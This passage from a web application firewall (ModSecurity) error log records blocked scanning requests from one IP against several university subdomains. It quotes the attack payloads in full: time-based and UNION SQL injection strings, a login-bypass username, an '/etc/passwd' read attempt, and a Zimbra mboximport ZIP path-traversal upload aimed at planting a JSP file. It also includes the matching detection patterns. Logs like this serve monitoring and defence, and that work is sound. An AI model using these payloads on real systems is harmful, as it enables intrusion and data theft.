"OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11P8Co-f0AAASfNuIAAAAg"]
[Tue Aug 29 11:34:07.332981 2023] [:error] [pid 1152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:month. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:month: 1 AND (SELECT 6881 FROM (SELECT(SLEEP(6)))iEAn)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11P8Co-f0AAASAHgEAAAAH"]
[Tue Aug 29 11:34:08.317169 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:PK\\x03\\x04\\x14\\x00\\b\\x00\\b\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x00\\x00\\x00../../../../ found within ARGS:PK\\x5cx03\\x5cx04\\x5cx14\\x5cx00\\x5cb\\x5cx00\\x5cb\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00: \\x00\\x00\\x00../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jsp\\x1c\\xc8\\xbd\\x0a\\xc20\\x10\\x00\\xe0\\xbdOQ\\x02\\x85\\x04!(\\xb8U\\x5c\\xfc[\\xc4\\x16;\\xb4t;\\xdbCS\\xcf$\\xc6K\\xf4\\xf1E\\xd7oUd.\\xb2\\xf6\\xc1X"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/service/extension/backup/mboximport"] [unique_id "ZO11QMCo-f0AAAQKOsIAAAAs"]
[Tue Aug 29 11:34:08.322995 2023] [:error] [pid 1183] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:PK\\x03\\x04\\x14\\x00\\b\\x00\\b\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x00\\x00\\x00../../../../ found within ARGS:PK\\x5cx03\\x5cx04\\x5cx14\\x5cx00\\x5cb\\x5cx00\\x5cb\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00: \\x00\\x00\\x00../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jsp\\x1c\\xc8\\xbd\\x0a\\xc20\\x10\\x00\\xe0\\xbdOQ\\x02\\x85\\x04!(\\xb8U\\x5c\\xfc[\\xc4\\x16;\\xb4t;\\xdbCS\\xcf$\\xc6K\\xf4\\xf1E\\xd7oUd.\\xb2\\xf6\\xc1X"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/service/extension/backup/mboximport"] [unique_id "ZO11QMCo-f0AAASfNuMAAAAg"]
[Tue Aug 29 11:34:08.327191 2023] [:error] [pid 1160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:PK\\x03\\x04\\x14\\x00\\b\\x00\\b\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x00\\x00\\x00../../../../ found within ARGS:PK\\x5cx03\\x5cx04\\x5cx14\\x5cx00\\x5cb\\x5cx00\\x5cb\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00: \\x00\\x00\\x00../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jsp\\x1c\\xc8\\xbd\\x0a\\xc20\\x10\\x00\\xe0\\xbdOQ\\x02\\x85\\x04!(\\xb8U\\x5c\\xfc[\\xc4\\x16;\\xb4t;\\xdbCS\\xcf$\\xc6K\\xf4\\xf1E\\xd7oUd.\\xb2\\xf6\\xc1X"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/service/extension/backup/mboximport"] [unique_id "ZO11QMCo-f0AAASI0AYAAAAG"]
[Tue Aug 29 11:34:08.336573 2023] [:error] [pid 1150] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:country_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:country_id: 1 AND (SELECT 42 FROM (SELECT(SLEEP(6)))b)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11QMCo-f0AAAR@KLYAAAAF"]
[Tue Aug 29 11:34:08.336865 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:country_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:country_id: 1 AND (SELECT 42 FROM (SELECT(SLEEP(6)))b)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11QMCo-f0AAARtAEsAAAAV"]
[Tue Aug 29 11:34:08.342852 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:month. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:month: 1 AND (SELECT 6881 FROM (SELECT(SLEEP(6)))iEAn)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11QMCo-f0AAAPDoMYAAAAP"]
[Tue Aug 29 11:34:08.343282 2023] [:error] [pid 1185] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:term. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:term: aaa' union select 1,sleep(6),3-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11QMCo-f0AAAShCVMAAAAi"]
[Tue Aug 29 11:34:08.344878 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:PK\\x03\\x04\\x14\\x00\\b\\x00\\b\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x00\\x00\\x00../../../../ found within ARGS:PK\\x5cx03\\x5cx04\\x5cx14\\x5cx00\\x5cb\\x5cx00\\x5cb\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00: \\x00\\x00\\x00../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jsp\\x1c\\xc8\\xbd\\x0a\\xc20\\x10\\x00\\xe0\\xbdOQ\\x02\\x85\\x04!(\\xb8U\\x5c\\xfc[\\xc4\\x16;\\xb4t;\\xdbCS\\xcf$\\xc6K\\xf4\\xf1E\\xd7oUd.\\xb2\\xf6\\xc1X"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/service/extension/backup/mboximport"] [unique_id "ZO11QMCo-f0AAASHh50AAAAD"]
[Tue Aug 29 11:34:08.352879 2023] [:error] [pid 1162] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:country_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:country_id: 1 AND (SELECT 42 FROM (SELECT(SLEEP(6)))b)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11QMCo-f0AAASK4eUAAAAI"]
[Tue Aug 29 11:34:08.359308 2023] [:error] [pid 1183] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:PK\\x03\\x04\\x14\\x00\\b\\x00\\b\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x00\\x00\\x00../../../../ found within ARGS:PK\\x5cx03\\x5cx04\\x5cx14\\x5cx00\\x5cb\\x5cx00\\x5cb\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00: \\x00\\x00\\x00../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jsp\\x1c\\xc8\\xbd\\x0a\\xc20\\x10\\x00\\xe0\\xbdOQ\\x02\\x85\\x04!(\\xb8U\\x5c\\xfc[\\xc4\\x16;\\xb4t;\\xdbCS\\xcf$\\xc6K\\xf4\\xf1E\\xd7oUd.\\xb2\\xf6\\xc1X"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/service/extension/backup/mboximport"] [unique_id "ZO11QMCo-f0AAASfNuQAAAAg"]
[Tue Aug 29 11:34:08.363793 2023] [:error] [pid 1185] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:term. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:term: aaa' union select 1,sleep(6),3-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11QMCo-f0AAAShCVQAAAAi"]
[Tue Aug 29 11:34:08.363839 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:term. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:term: aaa' union select 1,sleep(6),3-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11QMCo-f0AAAPDoMcAAAAP"]
[Tue Aug 29 11:34:08.364395 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "www.unla.ac.id"] [uri "/user/register"] [unique_id "ZO11QMCo-f0AAASEJSsAAAAE"]
[Tue Aug 29 11:34:08.365516 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:country_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:country_id: 1 AND (SELECT 42 FROM (SELECT(SLEEP(6)))b)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11QMCo-f0AAAPLwFoAAAAX"]
[Tue Aug 29 11:34:08.366821 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:term. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:term: aaa' union select 1,sleep(6),3-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11QMCo-f0AAASHh54AAAAD"]
[Tue Aug 29 11:34:08.369750 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:term. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:term: aaa' union select 1,sleep(6),3-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11QMCo-f0AAARtAEwAAAAV"]
[Tue Aug 29 11:34:09.303169 2023] [:error] [pid 1152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:country_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:country_id: 1 AND (SELECT 42 FROM (SELECT(SLEEP(6)))b)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11QcCo-f0AAASAHgUAAAAH"]
[Tue Aug 29 11:34:09.306108 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '-- - found within ARGS:username: admin' or '1'='1'-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO11QcCo-f0AAARtAE0AAAAV"]
[Tue Aug 29 11:34:09.308379 2023] [:error] [pid 1167] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:term. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:term: aaa' union select 1,sleep(6),3-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11QcCo-f0AAASPDKIAAAAS"]
[Tue Aug 29 11:34:09.319507 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:country_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:country_id: 1 AND (SELECT 42 FROM (SELECT(SLEEP(6)))b)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11QcCo-f0AAAPLwFwAAAAX"]
[Tue Aug 29 11:34:09.327035 2023] [:error] [pid 1171] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '-- - found within ARGS:username: admin' or '1'='1'-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO11QcCo-f0AAAST5AMAAAAZ"]
[Tue Aug 29 11:34:09.332626 2023] [:error] [pid 1170] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '-- - found within ARGS:username: admin' or '1'='1'-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO11QcCo-f0AAASS794AAAAY"]
[Tue Aug 29 11:34:09.339034 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '-- - found within ARGS:username: admin' or '1'='1'-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO11QcCo-f0AAAPLwF0AAAAX"]
[Tue Aug 29 11:34:09.343302 2023] [:error] [pid 1163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '-- - found within ARGS:username: admin' or '1'='1'-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO11QcCo-f0AAASLqC4AAAAM"]
[Tue Aug 29 11:34:10.309507 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:PK\\x03\\x04\\x14\\x00\\b\\x00\\b\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x00\\x00\\x00../../../../ found within ARGS:PK\\x5cx03\\x5cx04\\x5cx14\\x5cx00\\x5cb\\x5cx00\\x5cb\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00: \\x00\\x00\\x00../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jsp\\x1c\\xc8\\xbd\\x0a\\xc20\\x10\\x00\\xe0\\xbdOQ\\x02\\x85\\x04!(\\xb8U\\x5c\\xfc[\\xc4\\x16;\\xb4t;\\xdbCS\\xcf$\\xc6K\\xf4\\xf1E\\xd7oUd.\\xb2\\xf6\\xc1X"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/service/extension/backup/mboximport"] [unique_id "ZO11QsCo-f0AAASHh6EAAAAD"]
[Tue Aug 29 11:34:10.311289 2023] [:error] [pid 1170] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:username: admin cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/cgi-bin/weblogin.cgi"] [unique_id "ZO11QsCo-f0AAASS798AAAAY"]
